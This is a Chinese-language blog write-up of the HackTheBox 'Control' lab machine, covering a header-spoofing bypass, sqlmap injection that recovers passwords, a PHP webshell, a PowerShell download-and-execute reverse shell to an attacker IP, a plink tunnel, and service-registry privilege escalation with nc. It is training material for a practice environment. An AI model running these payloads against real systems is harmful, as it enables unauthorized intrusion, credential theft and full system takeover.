Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.


HackTheBox >_ Control_167

Control_167

image-20200922094954870

80    IIS10.0
135    rpc
3306    mysql

image-20200922095125847

页面上的loginadmin都指向admin.php

浏览

image-20200922095247651

查看页面源码

image-20200922095512971

指向192.168.4.29\myfiles内网地址

本地认证

尝试使用x-forwarded

抓个去往admin页面的包,并修改

image-20200922095711136

x-forwarded-for: 192.168.4.28

得到新页面

image-20200922095950757

四处看一看,每次动作都需要抓包,改包。 这就很难受。 先搞方便的。 既然存在3306 mysql

同时我们有一个良好的输入框,先在搜索框试试注入。

尝试搜索并抓包

image-20200922100052641

同时修改包,加上代理。

image-20200922100125181

把这个包内容保存为一个单独txt文件以便发往sqlmap进行注入分析

image-20200922100203786

$  sqlmap --all -r sql.txt --batch

漫长的等待,过程倒是可以看到不少东西。但是实在是太慢了。

image-20200922100259629

image-20200922100326614

image-20200922100346770

[12:33:37] [INFO] cracked password 'l3tm3!n' for user 'manager'                             
database management system users password hashes:                                           
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
    clear-text password: l3tm3!n
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

image-20200922100440430

manager:l3tm3!n hector:l33th4x0rhector 有密钥了。但是哪都不行。

所以打数据库。通过注入写入shell文件 还是抓搜索的包,改代理

image-20200922100624406

然后加上注入语句

productName=D-Link+DWA-171'; select "<?php echo shell_exec($_GET['evilcmd']);?>" into OUTFILE 'C:\\Inetpub\\wwwroot\\evil2.php';#

经过几次尝试,我们获得了一个可以执行命令的webshell

image-20200922100901346

然后,显然需要一个更棒的shell

在工作目录准备好powercat

https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

同时在工作目录建立临时web服务

image-20200922101118515

nc监听准备好

image-20200922101237536

利用webshell将准备好的powercat传输到服务器,并操作powercat从靶机链接kali

http://10.10.10.167/evil2.php?evilcmd=powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.25:8080/powercat.ps1');powercat -c 10.10.14.25 -p 4444 -e cmd"

image-20200922101501604

我们上去了。但是基础的枚举做不了,只知道用户hector,应该是下一个跳板

image-20200922101607676

image-20200922101656699

image-20200922101719568

5985.

https://cloud.tencent.com/developer/article/1499065

5985 winRm服务

我们有hash, so, 我们需要一个可以在本地进行生成隧道的程序,以便连接攻击机和端口5985

尝试通过之前的webshell上传plink,但是被吞,估计是没有写exe权限

image-20200922101805304

再尝试了各种上传方式无效后,我进行了各种google,并且在论坛中得到了,帮助。 我应该上传一个更加powerful的webshell。论坛的小伙伴推荐了

https://github.com/WhiteWinterWolf/wwwolf-php-webshell

重新利用注入点上传另外一个webshell

$ sqlmap -r sql.txt --file-write=/root/HackTheBox/Control_10.10.10.167/wolfshell.php --file-dest=c:/inetpub/wwwroot/wolfshell.php

So,新的webshell

image-20200922101928434

plink cp到工作目录。并通过新shell上传到 uploads目录

image-20200922102006228

image-20200922102126615

为我们的kali增加一个临时用户。为接下来使用ssh隧道做准备。 evilx:evilx

image-20200922102233168

复制脚本到工作目录 https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/evil-winrm.rb

之前的方法,重连rshell

image-20200922102832752

建立绕墙连接

plink.exe -R 5985:127.0.0.1:5985 10.10.14.25

使用之前新建的临时账户反连接kali

image-20200922103110859

为了权限,su root,输入kali 的root密码 利用root权限,使用之前得到的hector的凭证。得到hector的evil-winRm shell

hector:l33th4x0rhector

ruby evil-winrm.rb -i 127.0.0.1 -u Hector -p 'l33th4x0rhector' -s './' -e './'

image-20200922103235550

得到user

image-20200922103621873

windows ACL 即windows的访问控制列表/ 使用以下命令查询系统CurrentControlSet下的服务,以及使用的权限。

get-acl HKLM:\System\CurrentControlSet\services* | Format-List * | findstr /i "Hector Users Path:"

image-20200922103943620

image-20200922104006036

我们找到了一个服务wuauserv

Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv

image-20200922104533200

修改设定

reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.25 443 -e cmd" /f

这里不是很稳定,试了很多次

image-20200922104803729

kali端443端口设立监听,靶机启动我们修改好的服务

Start-Service wuauserv

监听端口得到system shell,root.txt在Desktop

image-20200922110435454

cd /
cd Users/Administrator/Desktop
type root.txt


8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1